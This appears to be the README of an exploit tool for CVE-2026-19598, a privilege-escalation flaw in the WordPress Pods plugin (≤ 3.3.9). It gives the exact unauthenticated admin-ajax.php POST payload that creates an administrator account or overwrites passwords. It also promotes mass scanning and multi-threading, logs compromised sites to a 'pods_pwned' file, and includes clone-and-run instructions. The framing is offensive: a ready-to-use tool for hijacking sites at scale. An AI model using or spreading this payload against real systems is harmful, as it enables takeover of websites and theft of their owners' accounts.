
Exploits CVE-2026-19598 in WordPress Pods plugin to create admin accounts or overwrite passwords via unauthenticated AJAX request, with mass scanning and multi-threading support.
Critical Unauthenticated Privilege Escalation (CVSS 9.8) — WordPress Pods Plugin ≤ 3.3.9
This tool exploits CVE-2026-19598, a vulnerability in the WordPress Pods plugin that allows unauthenticated attackers to create new administrator accounts or overwrite existing user passwords via the admin-ajax.php endpoint.
| Property | Value |
|---|---|
| CVE ID | CVE-2026-19598 |
| CVSS Score | 9.8 (Critical) |
| CWE | CWE-284 — Improper Access Control |
| Affected Product | WordPress Pods Plugin ≤ 3.3.9 |
| Patched Version | 3.3.9.1 |
| Auth Required | TIDAK (unauthenticated) |
| Status | Active Exploitation |
The vulnerability exists in the pods_admin AJAX action. Due to improper permission checks, the save_user method can be called without authentication when the meta-box-loader parameter is present. This allows an attacker to:
POST /wp-admin/admin-ajax.php action=pods_admin method=save_user meta-box-loader=1 user_login=evil_admin user_pass=Hacked123! role=administrator
The plugin fails to verify that the user making the request has proper capabilities, and the meta-box-loader parameter bypasses the intended security checks.
pods_pwned.txt with all exploited targetsrequests# Clone the repository
git clone https://github.com/0xCyp1337/CVE-2026-19598.git
cd CVE-2026-19598
python3 CVE-2026-19598.py
# Install dependencies (only requests needed)
pip install requests